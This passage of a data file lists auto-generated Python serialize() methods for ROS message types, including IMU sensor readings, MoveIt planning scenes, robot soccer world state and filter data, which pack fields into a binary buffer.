_x.placY, _x.placZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Front_sens.ID, _x.Front_sens.timestamp))\n buff.write(_get_struct_3d().pack(*self.Front_sens.compass))\n buff.write(_get_struct_3d().pack(*self.Front_sens.gyro))\n buff.write(_get_struct_3d().pack(*self.Front_sens.accel))\n buff.write(_get_struct_3d().pack(*self.Front_sens.fusionPose))\n buff.write(_get_struct_4d().pack(*self.Front_sens.fusionQPose))\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Rear_sens.ID, _x.Rear_sens.timestamp))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.compass))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.gyro))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.accel))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.fusionPose))\n buff.write(_get_struct_4d().pack(*self.Rear_sens.fusionQPose))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene_diff.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.position))\n length = len(self.planning_scene_diff.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.velocity))\n length = len(self.planning_scene_diff.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.effort))\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:\n _v1 = val1.position\n _x = _v1\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v2 = val1.orientation\n _x = _v2\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.fixed_frame_transforms:\n _v3 = val1.header\n buff.write(_struct_I.pack(_v3.seq))\n _v4 = _v3.stamp\n _x = _v4\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v3.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v5 = val1.transform\n _v6 = _v5.translation\n _x = _v6\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v7 = _v5.rotation\n _x = _v7\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(struct.pack(pattern, *val1.enabled))\n length = len(self.planning_scene_diff.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v8 = val1.shape\n buff.write(_struct_b.pack(_v8.type))\n length = len(_v8.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *_v8.dimensions))\n length = len(_v8.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *_v8.triangles))\n length = len(_v8.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v8.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v9 = val1.pose_stamped\n _v10 = _v9.header\n buff.write(_struct_I.pack(_v10.seq))\n _v11 = _v10.stamp\n _x = _v11\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v10.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v12 = _v9.pose\n _v13 = _v12.position\n _x = _v13\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v14 = _v12.orientation\n _x = _v14\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene_diff.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene_diff.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_objects:\n _v15 = val1.header\n buff.write(_struct_I.pack(_v15.seq))\n _v16 = _v15.stamp\n _x = _v16\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v15.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v17 = val1.operation\n buff.write(_struct_b.pack(_v17.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val2.dimensions))\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val2.triangles))\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v18 = val2.position\n _x = _v18\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v19 = val2.orientation\n _x = _v19\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v20 = val1.object\n _v21 = _v20.header\n buff.write(_struct_I.pack(_v21.seq))\n _v22 = _v21.stamp\n _x = _v22\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v21.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v20.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v20.padding))\n _v23 = _v20.operation\n buff.write(_struct_b.pack(_v23.operation))\n length = len(_v20.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v20.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val3.dimensions))\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val3.triangles))\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v20.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v20.poses:\n _v24 = val3.position\n _x = _v24\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v25 = val3.orientation\n _x = _v25\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))\n _x = self.planning_scene_diff.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_map.boxes:\n _v26 = val1.center\n _x = _v26\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v27 = val1.extents\n _x = _v27\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v28 = val1.axis\n _x = _v28\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n length = len(self.operations.collision_operations)\n buff.write(_struct_I.pack(length))\n for val1 in self.operations.collision_operations:\n _x = val1.object1\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object2\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs))\n _x = self.model_aligned.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.id))\n _x = self.model_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs))\n _x = self.model_aligned.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.track.id))\n length = len(self.model_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose:\n _v57 = val1.position\n _x = _v57\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v58 = val1.orientation\n _x = _v58\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v59 = val1.stamp\n _x = _v59\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_projected:\n _v60 = val1.position\n _x = _v60\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v61 = val1.orientation\n _x = _v61\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_resampled:\n _v62 = val1.position\n _x = _v62\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v63 = val1.orientation\n _x = _v63\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.model_aligned.track.pose_flags))\n length = len(self.model_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs))\n _x = self.data_aligned.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data_aligned.id))\n _x = self.data_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs))\n _x = self.data_aligned.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data_aligned.track.id))\n length = len(self.data_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose:\n _v64 = val1.position\n _x = _v64\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v65 = val1.orientation\n _x = _v65\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v66 = val1.stamp\n _x = _v66\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_projected:\n _v67 = val1.position\n _x = _v67\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v68 = val1.orientation\n _x = _v68\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_resampled:\n _v69 = val1.position\n _x = _v69\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v70 = val1.orientation\n _x = _v70\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.data_aligned.track.pose_flags))\n length = len(self.data_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n buff.write(_struct_9d.pack(*self.R))\n buff.write(_struct_3d.pack(*self.T))\n _x = self\n buff.write(_struct_df.pack(_x.dist_rot, _x.dist_trans))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_9B.pack(_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, _x.water_sts))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs))\n _x = self.obstacleinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.obstacleinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.obstacleinfo.polar_pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _x = self\n buff.write(_get_struct_3I().pack(_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs))\n _x = self.oppinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.oppinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.oppinfo.polar_pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n length = len(self.robotinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.robotinfo:\n _v1 = val1.header\n buff.write(_get_struct_I().pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_7i().pack(_x.AgentID, _x.targetNum1, _x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum))\n _v3 = val1.pos\n _x = _v3\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v4 = val1.heading\n buff.write(_get_struct_f().pack(_v4.theta))\n buff.write(_get_struct_f().pack(val1.vrot))\n _v5 = val1.vtrans\n _x = _v5\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_5Bf().pack(_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time))\n _v6 = val1.target\n _x = _v6\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.ballinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.ballinfo:\n _v7 = val1.header\n buff.write(_get_struct_I().pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.ballinfostate))\n _v9 = val1.pos\n _x = _v9\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v10 = val1.real_pos\n _x = _v10\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _v11 = val1.velocity\n _x = _v11\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_2B().pack(_x.pos_known, _x.velocity_known))\n _x = self\n buff.write(_get_struct_3I().pack(_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs))\n _x = self.coachinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B2I4f4B().pack(_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, _x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, _x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, _x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sim_step\n buff.write(_get_struct_I().pack(_x))\n _x = self.type.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.parent_name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2f7dI().pack(_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count))\n length = len(self.triggered)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(struct.Struct(pattern).pack(*self.triggered))\n length = len(self.range)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.Struct(pattern).pack(*self.range))\n length = len(self.measurement)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.Struct(pattern).pack(*self.measurement))\n length = len(self.sensed_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.sensed_objects:\n _x = val1.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sensed_objects_map\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_QBdB2I().pack(_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols))\n length = len(self.predict.trans_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.trans_jacobian.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols))\n length = len(self.predict.trans_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.trans_noise_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, 